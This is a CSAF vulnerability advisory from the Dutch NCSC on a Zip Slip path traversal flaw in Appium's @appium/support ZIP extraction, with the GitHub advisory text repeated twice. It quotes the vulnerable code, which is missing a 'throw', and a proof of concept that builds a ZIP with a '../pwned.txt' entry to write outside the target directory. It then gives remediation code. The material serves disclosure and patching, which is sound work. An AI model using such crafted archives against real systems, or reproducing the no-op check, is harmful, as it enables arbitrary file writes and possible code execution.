{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-30973", "tracking": { "current_release_date": "2026-03-20T09:33:20.683133Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-30973", "initial_release_date": "2026-03-10T18:37:50.464794Z", "revision_history": [ { "date": "2026-03-10T18:37:50.464794Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-10T18:37:54.914919Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-10T18:39:40.939006Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-10T18:39:42.456602Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-11T00:53:17.482832Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-11T00:53:20.785072Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-11T14:54:51.311833Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-11T14:55:01.381352Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-12T14:38:42.585263Z", "number": "9", "summary": "Unknown change." }, { "date": "2026-03-19T15:29:36.121301Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-19T15:29:37.894203Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:33:18.335462Z", "number": "12", "summary": "Source connected.| CVE status created. (valid)| EPSS created." } ], "status": "interim", "version": "12" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<7.0.6", "product": { "name": "vers:unknown/<7.0.6", "product_id": "CSAFPID-5776411" } } ], "category": "product_name", "name": "support" } ], "category": "vendor", "name": "@appium" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-30973", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" }, "notes": [ { "category": "description", "text": "Appium is an automation framework that provides WebDriver-based automation possibilities for a wide range platforms. Prior to 7.0.6, @appium/support contains a ZIP extraction implementation (extractAllTo() via ZipExtractor.extract()) with a path traversal (Zip Slip) check that is non-functional. The check at line 88 of packages/support/lib/zip.js creates an Error object but never throws it, allowing malicious ZIP entries with ../ path components to write files outside the intended destination directory. This affects all JS-based extractions (the default code path), not only those using the fileNamesEncoding option. This vulnerability is fixed in 7.0.6.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-30973" }, { "category": "description", "text": "Appium is an automation framework that provides WebDriver-based automation possibilities for a wide range platforms. Prior to 7.0.6, @appium/support contains a ZIP extraction implementation (extractAllTo() via ZipExtractor.extract()) with a path traversal (Zip Slip) check that is non-functional. The check at line 88 of packages/support/lib/zip.js creates an Error object but never throws it, allowing malicious ZIP entries with ../ path components to write files outside the intended destination directory. This affects all JS-based extractions (the default code path), not only those using the fileNamesEncoding option. This vulnerability is fixed in 7.0.6.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-30973" }, { "category": "description", "text": "## Summary\n\n`@appium/support` contains a ZIP extraction implementation (`extractAllTo()` via `ZipExtractor.extract()`) with a path traversal (Zip Slip) check that is non-functional. The check at line 88 of `packages/support/lib/zip.js` creates an `Error` object but never throws it, allowing malicious ZIP entries with `../` path components to write files outside the intended destination directory. This affects all JS-based extractions (the default code path), not only those using the `fileNamesEncoding` option.\n\n## Severity\n\n**Medium** (CVSS 3.1: 6.5)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`\n\n- **Attack Vector:** Network — malicious ZIP files can be supplied over the network (e.g., app packages via URL)\n- **Attack Complexity:** Low — no special conditions required beyond providing a crafted ZIP\n- **Privileges Required:** None — no authentication needed to supply a malicious archive\n- **User Interaction:** Required — a user or automation system must initiate extraction of the attacker's archive\n- **Scope:** Unchanged — impact stays within the file system permissions of the Appium process\n- **Confidentiality Impact:** None — the vulnerability enables file writes, not reads\n- **Integrity Impact:** High — arbitrary file write to any location writable by the process\n- **Availability Impact:** None — no direct availability impact\n\n## Affected Component\n\n- `packages/support/lib/zip.js` — `ZipExtractor.extract()` (line 88) and `ZipExtractor.extractEntry()` (lines 111-145)\n\n## CWE\n\n- **CWE-22**: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\n\n## Description\n\n### Missing `throw` renders Zip Slip protection non-functional\n\nThe `ZipExtractor.extract()` method contains a path traversal check intended to prevent Zip Slip attacks. However, the check creates an `Error` object as a bare expression without the `throw` keyword, making it a no-op:\n\n```javascript\n// packages/support/lib/zip.js, lines 80-93\nconst destDir = path.dirname(path.join(dir, fileName));\ntry {\n await fs.mkdir(destDir, {recursive: true});\n\n const canonicalDestDir = await fs.realpath(destDir);\n const relativeDestDir = path.relative(dir, canonicalDestDir);\n\n if (relativeDestDir.split(path.sep).includes('..')) {\n new Error( // <-- BUG: missing `throw`\n `Out of bound path \"${canonicalDestDir}\" found while processing file ${fileName}`\n );\n }\n\n await this.extractEntry(entry); // extraction proceeds unconditionally\n```\n\nThe presence of a well-formatted error message and surrounding try/catch block (lines 95-99) strongly suggests the `throw` keyword was accidentally omitted.\n\n### yauzl does not provide its own traversal protection\n\nThe upstream `yauzl` library explicitly [does not offer path traversal protection](https://github.com/thejoshwolfe/yauzl#no-path-traversal-protection) regardless of the `decodeStrings` setting. This means the vulnerability affects **all** JS-based extractions through `ZipExtractor`, not only those where `fileNamesEncoding` is set. The `fileNamesEncoding` option bypasses yauzl's string decoding (`decodeStrings: false`), but even with `decodeStrings: true`, yauzl passes through `../` path components without rejection.\n\n### Unprotected write sinks\n\nThe `extractEntry` method writes to attacker-controlled paths with no additional validation:\n\n```javascript\n// packages/support/lib/zip.js, lines 111-145\nconst fileName = this.extractFileName(entry);\nconst dest = path.join(dir, fileName); // resolves ../pwned.txt outside dir\n// ...\nawait fs.symlink(link, dest); // symlink creation (line 143)\nawait pipeline(readStream, fs.createWriteStream(dest, {mode: procMode})); // file write (line 145)\n```\n\nAdditionally, `_extractEntryTo()` (line 263) used by `readEntries()` has no traversal check at all:\n\n```javascript\nconst dstPath = path.resolve(destDir, entry.fileName); // no validation\n```\n\n### Default code path is vulnerable\n\nThe `extractAllTo()` function uses the JS-based `ZipExtractor` by default. The system unzip fallback (`useSystemUnzip: true`) must be explicitly enabled and only provides protection if the system binary succeeds:\n\n```javascript\n// packages/support/lib/zip.js, lines 203-210\nif (opts.useSystemUnzip) {\n try {\n await extractWithSystemUnzip(zipFilePath, dir);\n return;\n } catch (err) {\n log.warn('unzip failed; falling back to JS: %s', err.stderr || err.message);\n // Falls through to the vulnerable JS implementation\n }\n}\n```\n\n## Proof of Concept\n\n```bash\n# 1) Install deps for the support package\ncd packages/support\nnpm install --omit=dev --ignore-scripts --no-audit --no-fund --workspaces=false\n\n# 2) Create a malicious ZIP containing a traversal entry\nexport WORK=/tmp/appium_zip_slip_poc\nrm -rf \"$WORK\" && mkdir -p \"$WORK/dest\"\npython3 - <<'PY'\nimport zipfile, os\nwork = os.environ['WORK']\nzip_path = os.path.join(work, 'evil.zip')\nwith zipfile.ZipFile(zip_path, 'w') as z:\n z.writestr('../pwned.txt', 'ZIPSLIP_MARKER')\nprint('created', zip_path)\nPY\n\n# 3) Extract with the JS implementation (default path, no fileNamesEncoding needed)\nnode --experimental-default-type=module --experimental-specifier-resolution=node - <<'NODE'\nimport path from 'node:path';\nimport fs from 'node:fs/promises';\nimport { extractAllTo } from './lib/zip.js';\n\nconst work = process.env.WORK;\nconst zipPath = path.join(work, 'evil.zip');\nconst dest = path.join(work, 'dest');\n\nawait extractAllTo(zipPath, dest, { useSystemUnzip: false });\n\nconst outside = path.join(work, 'pwned.txt');\nconsole.log('outside exists?', await fs.stat(outside).then(() => true, () => false));\nconsole.log('outside content:', (await fs.readFile(outside, 'utf8')).trim());\nNODE\n# Expected output:\n# outside exists? true\n# outside content: ZIPSLIP_MARKER\n```\n\n## Impact\n\n- **Arbitrary file write**: An attacker can write files to any location writable by the Appium process, outside the intended extraction directory.\n- **Arbitrary symlink creation**: Malicious ZIP entries with symlink attributes can create symlinks pointing to arbitrary targets, enabling further attacks on subsequent file operations.\n- **Potential code execution**: By overwriting scripts, configuration files, `node_modules` contents, cron jobs, shell profiles, or other executable artifacts, arbitrary file write can chain into remote code execution.\n- **Affects all JS-based extractions**: The default code path (without `useSystemUnzip: true`) is vulnerable regardless of whether `fileNamesEncoding` is set.\n\n## Recommended Remediation\n\n### Option 1: Add the missing `throw` keyword (preferred — minimal fix)\n\n```javascript\n// packages/support/lib/zip.js, line 88\nif (relativeDestDir.split(path.sep).includes('..')) {\n throw new Error( // Add `throw`\n `Out of bound path \"${canonicalDestDir}\" found while processing file ${fileName}`\n );\n}\n```\n\nThis is the lowest-risk fix: it restores the clearly intended behavior of the existing check. The try/catch block at lines 95-99 will catch the error, set `canceled = true`, close the zip, and reject the promise — exactly the designed error-handling flow.\n\n### Option 2: Add traversal protection to `_extractEntryTo` as well\n\nThe `_extractEntryTo` function (line 262) also lacks a traversal check. For defense-in-depth, add validation there too:\n\n```javascript\nasync function _extractEntryTo(zipFile, entry, destDir) {\n const dstPath = path.resolve(destDir, entry.fileName);\n const canonicalDest = path.resolve(dstPath);\n const canonicalDestDir = path.resolve(destDir);\n if (!canonicalDest.startsWith(canonicalDestDir + path.sep) && canonicalDest !== canonicalDestDir) {\n throw new Error(\n `Out of bound path \"${canonicalDest}\" found while processing file ${entry.fileName}`\n );\n }\n // ... rest of function\n}\n```\n\n## Credit\n\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).", "title": "github - https://github.com/advisories/GHSA-rfx7-4xw3-gh4m" }, { "category": "description", "text": "## Summary\n\n`@appium/support` contains a ZIP extraction implementation (`extractAllTo()` via `ZipExtractor.extract()`) with a path traversal (Zip Slip) check that is non-functional. The check at line 88 of `packages/support/lib/zip.js` creates an `Error` object but never throws it, allowing malicious ZIP entries with `../` path components to write files outside the intended destination directory. This affects all JS-based extractions (the default code path), not only those using the `fileNamesEncoding` option.\n\n## Severity\n\n**Medium** (CVSS 3.1: 6.5)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`\n\n- **Attack Vector:** Network — malicious ZIP files can be supplied over the network (e.g., app packages via URL)\n- **Attack Complexity:** Low — no special conditions required beyond providing a crafted ZIP\n- **Privileges Required:** None — no authentication needed to supply a malicious archive\n- **User Interaction:** Required — a user or automation system must initiate extraction of the attacker's archive\n- **Scope:** Unchanged — impact stays within the file system permissions of the Appium process\n- **Confidentiality Impact:** None — the vulnerability enables file writes, not reads\n- **Integrity Impact:** High — arbitrary file write to any location writable by the process\n- **Availability Impact:** None — no direct availability impact\n\n## Affected Component\n\n- `packages/support/lib/zip.js` — `ZipExtractor.extract()` (line 88) and `ZipExtractor.extractEntry()` (lines 111-145)\n\n## CWE\n\n- **CWE-22**: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\n\n## Description\n\n### Missing `throw` renders Zip Slip protection non-functional\n\nThe `ZipExtractor.extract()` method contains a path traversal check intended to prevent Zip Slip attacks. However, the check creates an `Error` object as a bare expression without the `throw` keyword, making it a no-op:\n\n```javascript\n// packages/support/lib/zip.js, lines 80-93\nconst destDir = path.dirname(path.join(dir, fileName));\ntry {\n await fs.mkdir(destDir, {recursive: true});\n\n const canonicalDestDir = await fs.realpath(destDir);\n const relativeDestDir = path.relative(dir, canonicalDestDir);\n\n if (relativeDestDir.split(path.sep).includes('..')) {\n new Error( // <-- BUG: missing `throw`\n `Out of bound path \"${canonicalDestDir}\" found while processing file ${fileName}`\n );\n }\n\n await this.extractEntry(entry); // extraction proceeds unconditionally\n```\n\nThe presence of a well-formatted error message and surrounding try/catch block (lines 95-99) strongly suggests the `throw` keyword was accidentally omitted.\n\n### yauzl does not provide its own traversal protection\n\nThe upstream `yauzl` library explicitly [does not offer path traversal protection](https://github.com/thejoshwolfe/yauzl#no-path-traversal-protection) regardless of the `decodeStrings` setting. This means the vulnerability affects **all** JS-based extractions through `ZipExtractor`, not only those where `fileNamesEncoding` is set. The `fileNamesEncoding` option bypasses yauzl's string decoding (`decodeStrings: false`), but even with `decodeStrings: true`, yauzl passes through `../` path components without rejection.\n\n### Unprotected write sinks\n\nThe `extractEntry` method writes to attacker-controlled paths with no additional validation:\n\n```javascript\n// packages/support/lib/zip.js, lines 111-145\nconst fileName = this.extractFileName(entry);\nconst dest = path.join(dir, fileName); // resolves ../pwned.txt outside dir\n// ...\nawait fs.symlink(link, dest); // symlink creation (line 143)\nawait pipeline(readStream, fs.createWriteStream(dest, {mode: procMode})); // file write (line 145)\n```\n\nAdditionally, `_extractEntryTo()` (line 263) used by `readEntries()` has no traversal check at all:\n\n```javascript\nconst dstPath = path.resolve(destDir, entry.fileName); // no validation\n```\n\n### Default code path is vulnerable\n\nThe `extractAllTo()` function uses the JS-based `ZipExtractor` by default. The system unzip fallback (`useSystemUnzip: true`) must be explicitly enabled and only provides protection if the system binary succeeds:\n\n```javascript\n// packages/support/lib/zip.js, lines 203-210\nif (opts.useSystemUnzip) {\n try {\n await extractWithSystemUnzip(zipFilePath, dir);\n return;\n } catch (err) {\n log.warn('unzip failed; falling back to JS: %s', err.stderr || err.message);\n // Falls through to the vulnerable JS implementation\n }\n}\n```\n\n## Proof of Concept\n\n```bash\n# 1) Install deps for the support package\ncd packages/support\nnpm install --omit=dev --ignore-scripts --no-audit --no-fund --workspaces=false\n\n# 2) Create a malicious ZIP containing a traversal entry\nexport WORK=/tmp/appium_zip_slip_poc\nrm -rf \"$WORK\" && mkdir -p \"$WORK/dest\"\npython3 - <<'PY'\nimport zipfile, os\nwork = os.environ['WORK']\nzip_path = os.path.join(work, 'evil.zip')\nwith zipfile.ZipFile(zip_path, 'w') as z:\n z.writestr('../pwned.txt', 'ZIPSLIP_MARKER')\nprint('created', zip_path)\nPY\n\n# 3) Extract with the JS implementation (default path, no fileNamesEncoding needed)\nnode --experimental-default-type=module --experimental-specifier-resolution=node - <<'NODE'\nimport path from 'node:path';\nimport fs from 'node:fs/promises';\nimport { extractAllTo } from './lib/zip.js';\n\nconst work = process.env.WORK;\nconst zipPath = path.join(work, 'evil.zip');\nconst dest = path.join(work, 'dest');\n\nawait extractAllTo(zipPath, dest, { useSystemUnzip: false });\n\nconst outside = path.join(work, 'pwned.txt');\nconsole.log('outside exists?', await fs.stat(outside).then(() => true, () => false));\nconsole.log('outside content:', (await fs.readFile(outside, 'utf8')).trim());\nNODE\n# Expected output:\n# outside exists? true\n# outside content: ZIPSLIP_MARKER\n```\n\n## Impact\n\n- **Arbitrary file write**: An attacker can write files to any location writable by the Appium process, outside the intended extraction directory.\n- **Arbitrary symlink creation**: Malicious ZIP entries with symlink attributes can create symlinks pointing to arbitrary targets, enabling further attacks on subsequent file operations.\n- **Potential code execution**: By overwriting scripts, configuration files, `node_modules` contents, cron jobs, shell profiles, or other executable artifacts, arbitrary file write can chain into remote code execution.\n- **Affects all JS-based extractions**: The default code path (without `useSystemUnzip: true`) is vulnerable regardless of whether `fileNamesEncoding` is set.\n\n## Recommended Remediation\n\n### Option 1: Add the missing `throw` keyword (preferred — minimal fix)\n\n```javascript\n// packages/support/lib/zip.js, line 88\nif (relativeDestDir.split(path.sep).includes('..')) {\n throw new Error( // Add `throw`\n `Out of bound path \"${canonicalDestDir}\" found while processing file ${fileName}`\n );\n}\n```\n\nThis is the lowest-risk fix: it restores the clearly intended behavior of the existing check. The try/catch block at lines 95-99 will catch the error, set `canceled = true`, close the zip, and reject the promise — exactly the designed error-handling flow.\n\n### Option 2: Add traversal protection to `_extractEntryTo` as well\n\nThe `_extractEntryTo` function (line 262) also lacks a traversal check. For defense-in-depth, add validation there too:\n\n```javascript\nasync function _extractEntryTo(zipFile, entry, destDir) {\n const dstPath = path.resolve(destDir, entry.fileName);\n const canonicalDest = path.resolve(dstPath);\n const canonicalDestDir = path.resolve(destDir);\n if (!canonicalDest.startsWith(canonicalDestDir + path.sep) && canonicalDest !== canonicalDestDir) {\n throw new Error(\n `Out of bound path \"${canonicalDest}\" found while processing file ${entry.fileName}`\n );\n }\n // ... rest of function\n}\n```\n\n## Credit\n\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).", "title": "github - https://api.github.com/advisories/GHSA-rfx7-4xw3-gh4m" }, { "category": "other", "text": "0.00039", "title": "EPSS" }, { "category": "other", "text": "3.8", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, There is cwe data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5776411" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30973" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-30973" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-30973" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/30xxx/CVE-2026-30973.json" }, { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-rfx7-4xw3-gh4m" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-rfx7-4xw3-gh4m" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30973" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-rfx7-4xw3-gh4m" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/appium/appium/releases/tag/@appium/support@7.0.6" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/appium/appium/security/advisories/GHSA-rfx7-4xw3-gh4m" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30973" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-rfx7-4xw3-gh4m" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5776411" ] } ], "title": "CVE-2026-30973" } ] }